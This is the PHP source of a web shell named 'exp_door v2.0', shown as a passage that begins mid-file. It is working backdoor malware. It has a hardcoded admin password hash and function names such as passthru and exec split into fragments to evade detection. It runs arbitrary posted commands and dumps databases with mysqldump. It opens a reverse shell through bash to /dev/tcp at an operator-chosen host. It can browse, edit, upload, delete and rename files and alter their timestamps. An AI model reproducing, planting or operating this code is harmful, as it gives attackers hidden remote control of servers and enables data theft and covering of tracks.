"; $string.= "" . '
'; $string.= "" . '
'; $string.= "" . '
'; $string.= "" . '
' . '
'; $string.= ""; $string.= ""; return $string; } function check($login, $pass) { if (($login == "admin") && ($pass == "a4225f7a4eacbcaf85d7e64b085ae241")) return true; //testpass else return false; } if (isset($_POST['log'])) { $login = $_POST['login']; $pass = md5($_POST['pass']); if (check($login, $pass)) { setcookie("login", $login); setcookie("pass", $pass); header("Refresh:0"); // или header("Location: http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); } else echo "Access denied!"; } if (isset($_POST['exit'])) { setcookie("login", $login, time() - 3600, '/'); setcookie("pass", $pass, time() - 3600, '/'); header("Refresh:0"); } ?> exp_door v2.0 ' . $s . ''; } elseif (strpos($s, 'rw', -3)) { return '' . $s . ''; } else { return '' . $s . ''; } } function numPerms($file) { $numperm = substr(sprintf('%o', fileperms($file)), -4); if ((int)(substr($numperm, 0, 1)) > 1) { return '' . $numperm . ''; } else { return '' . $numperm . ''; } } $home = '

exp_door v2.0

'; echo $home; if (isset($_POST['submitBtn'])) { $actpath = isset($_POST['path']) ? $_POST['path'] : __DIR__; chdir($actpath); } else { $actpath = isset($_GET['path']) ? $_GET['path'] : __DIR__; chdir($actpath); } $login = $_COOKIE['login']; $pass = $_COOKIE['pass']; if (check($login, $pass)) { $a1 = 'pas' . 'sth' . 'ru'; $cwd = $_GET['path']; if (empty($cwd)) { $cwd = getcwd(); } $uname = php_uname(); $php = phpversion(); $temp_file = sys_get_temp_dir(); $df = disk_free_space("/"); $dt = disk_total_space("/"); $freeSpace = $df / 1048576; $freeUnit = 'Mb'; if ($freeSpace >= 1024) { $freeSpace/= 1024; $freeUnit = 'Gb'; } $totalSpace = $dt / 1048576; $totalUnit = 'Mb'; if ($totalSpace >= 1024) { $totalSpace/= 1024; $totalUnit = 'Gb'; } $freePer = round($df / $dt * 100.0, 2); if ($freePer > 100) $freePer = 100; echo '
';
    echo 'id    | ';
    echo $a1("id");
    echo 'uname | ' . $uname . '
';
    echo 'tmp   | ' . $temp_file . ' ' . substr(sprintf('%o', fileperms($temp_file)), -4) . '
';
    echo 'php   | ' . $php . '
';
    echo 'server| ' . $_SERVER['SERVER_NAME'] . ' ' . $_SERVER["SERVER_ADDR"] . ' ' . $_SERVER['SERVER_SOFTWARE'] . '
';
    echo 'date  | ' . date("Y-m-d-H:i:s e P") . ' GMT' . '
';
    echo 'HDD   | ' . "Total: " . round($totalSpace, 2) . " " . $totalUnit . " ";
    echo "Free: " . round($freeSpace, 2) . " " . $freeUnit . "(" . $freePer . "%)" . '
';
    echo 'cwd   | ' . $cwd . ' ' . "[" . numPerms($actpath) . "] " . printPerms($actpath) . '
';
    echo '
'; echo '
'; function showContent($path) { if ($handle = opendir($path)) { $up = substr($path, 0, (strrpos(dirname($path . "/."), "/"))); if ($up == NULL) { $up = "/"; } $HTML = '
Hide tools
'; echo $HTML; $a1 = 'pas' . 'sth' . 'ru'; $b2 = 'ex' . 'ec'; $down = "which get;which wget;which lynx;which curl;which fetch;which links;"; $aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de"; $bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de"; $fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc"); if (isset($_POST['cmd'])) { echo '
';
                $a1($_POST['cmd']);
                echo '
'; } if (isset($_POST['info'])) { echo phpinfo(); } if (isset($_POST['down'])) { echo ''; } if (isset($_POST['fun'])) { echo '
';
                $a1($fun);
                echo '
'; } if (isset($_POST['DB'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $name = $_POST['name']; $port = $_POST['port']; $link = new mysqli($host, $user, $pass, $name, $port); if ($link->connect_error) { die("Database access is not available:
" . $link->connect_error); exit(); } else { $b2('mysqldump --port=' . $port . ' --user=' . $user . ' --password=' . $pass . ' --host=' . $host . ' ' . $name . ' > file.sql'); echo 'Dump completed!'; } } if (isset($_POST['submit'])) { $base64 = $_POST['base64']; $encode = $aTwo($base64); echo '

' . "Encode base64: " . '

' . $encode; } if (isset($_POST['submit2'])) { $base64_d = $_POST['base64']; $decode = $bTwo($base64_d); echo '

' . "Decode base64: " . '

' . htmlentities($decode); } if (isset($_POST['submit_u'])) { $url = $_POST['url']; $encode_u = urlencode($url); echo '

' . "Encode url: " . '

' . $encode_u; } if (isset($_POST['submit_u2'])) { $url_d = $_POST['url']; $decode_u = urldecode($url_d); echo '

' . "Decode url: " . '

' . htmlentities($decode_u); } if (isset($_POST['submit_hex'])) { $h = $_POST['hex']; $encode_hex = "0x" . bin2hex($h); echo '

' . "Encode HEX: " . '

' . $encode_hex; } if (isset($_POST['submit_hex2'])) { $h2 = $_POST['hex']; $decode_hex = hex2bin(substr($h2, 2)); echo '

' . "Decode HEX: " . '

' . htmlentities($decode_hex); } if (isset($_POST['reverse'])) { $back = explode("|", $_POST['host_']); $a1("bash -c 'bash -i &> /dev/tcp/$back[0]/$back[1] 0>&1'"); } $HTML2 = '
' . "" . '
Up one level Path:
'; echo $HTML2 . "
"; echo "" . "" . "" . "" . "" . "" . ""; $alldir = array(); $allfile = array(); $alllink = array(); while (false !== ($file = readdir($handle))) { if (is_link($path . '/' . $file)) { array_push($alllink, $file); } elseif (is_file($path . '/' . $file)) { array_push($allfile, $file); } elseif (is_dir($path . '/' . $file)) { array_push($alldir, $file); } } closedir($handle); } else { echo '
Can\'t open folder!

--> Go back <--
'; } sort($alldir); sort($allfile); sort($alllink); $allfiles = array_merge($alldir, $allfile, $alllink); foreach ($allfiles as $file) { if ($file != "." && $file != "..") { $fName = $file; $userinfo = posix_getpwuid(fileowner($file)) ["name"] . "/" . posix_getgrgid(filegroup($file)) ["name"]; if (strlen($path) == 1) { $file = $path . $file; } else { $file = $path . '/' . $file; } if (is_link($file)) { $disppath = readlink($file); if (strpos($disppath, "/") != 0) { $disppath = "/" . $disppath; } if (is_file(readlink($file))) { echo "" . "" . "" . "" . "" . ""; } else { echo "" . "" . "" . "" . "" . ""; } } elseif (is_file($file)) { $endsize = ""; $fullsize = filesize($file); if ($fullsize < 1024) { $endsize = "B"; } elseif ($fullsize < 1048576) { $endsize = "KB"; $fullsize/= 1024; } elseif ($fullsize < 1073741824) { $endsize = "MB"; $fullsize/= 1048576; } echo "" . "" . "" . "" . "" . ""; } elseif (is_dir($file)) { echo "" . "" . "" . "" . "" . ""; } } } echo "
" . "Name" . "" . "Action" . "" . "Permissions" . "" . "Owner/Group" . "" . "Modify" . "" . "Size" . "
" . "" . "➦" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . "$fName " . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . " " . "" . "" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "" . round($fullsize, 2) . " " . $endsize . "
" . "" . " $fName" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "DIR
"; } echo showContent($actpath); function removeDirectory($dir) { if ($objs = glob($dir . "/*")) { foreach ($objs as $obj) { is_dir($obj) ? removeDirectory($obj) : unlink($obj); } } return rmdir($dir); } $modal = '

text

Close
'; if (isset($_POST['del'])) { if (!empty($_POST['choose'])) { foreach ($_POST['choose'] as $value) { if (is_link($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The link was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The link was not deleted!" . '

', $modal); } } elseif (is_file($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The file was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The file was not deleted!" . '

', $modal); } } elseif (is_dir($value)) { if (removeDirectory($value)) { echo str_replace("text", '

' . "Directory deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The directory was not deleted!" . '

', $modal); } } } } } if (isset($_POST['edit'])) { if (!empty($_POST['choose'])) { $val = $_POST['choose'][0]; if (is_readable($val)) { $formedit = "
Close
"; echo $formedit; } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } } if (isset($_POST['edit_code'])) { $result = file_put_contents($_POST['correction'], $_POST['edit_code']); if ($result === FALSE) { echo str_replace("text", '

' . "Error writing to file!" . '

', $modal); } else { echo str_replace("text", '

' . "The file was successfully modified!" . '

', $modal); } } if (isset($_POST['view'])) { if (is_readable($_POST['view'])) { $doc = fopen($_POST['view'], "rt"); $contents = ''; while (!feof($doc)) $contents.= fread($doc, 4096); fclose($doc); if (filesize($_POST['view']) == 0) { echo str_replace("text", '

' . "The file is empty!" . '

', $modal); } elseif ($contents) { echo '
' . '
' . "
"; highlight_string($contents); echo "
" . 'Close' . "
" . "
"; } } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } if (isset($_POST['up']) && !empty($_POST['choose'])) { echo '
' . '
' . "
"; echo '

' . "upload_max_filesize: " . ini_get("upload_max_filesize") . "
" . "post_max_size: " . ini_get("post_max_size") . '

'; echo ' 









';
        echo "
" . 'Close' . "
" . "
"; } if ($_FILES['filename']['error'] == UPLOAD_ERR_OK) { $name = $_POST['up_file'] . '/' . $_FILES['filename']['name']; if (move_uploaded_file($_FILES['filename']['tmp_name'], $name)) { $text = '

' . "The file was uploaded successfully!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } } else { echo str_replace("text", '

' . "Error! The file is not selected!" . '

', $modal); } if (isset($_POST['tou']) && !empty($_POST['choose'])) { echo '
' . '
' . "
"; echo "

"; echo "
" . 'Close' . "
" . "
"; } if (isset($_POST['code'])) { if (touch($_POST['date_file'], strtotime($_POST['code']))) { $text = '

' . "Modification date changed!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } else { echo str_replace("text", '

' . "Error! You couldn't change the date!" . '

', $modal); } } if (isset($_POST['ren']) && !empty($_POST['choose'])) { echo '
' . '
' . "
"; echo "

"; echo "
" . 'Close' . "
" . "
"; } if (isset($_POST['r_code'])) { if (rename($_POST['ren_file'], $_POST['r_code'])) { echo str_replace("text", '

' . "Renaming completed!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! Not renamed!" . '

', $modal); } } echo '
'; } else echo showForm(); ?>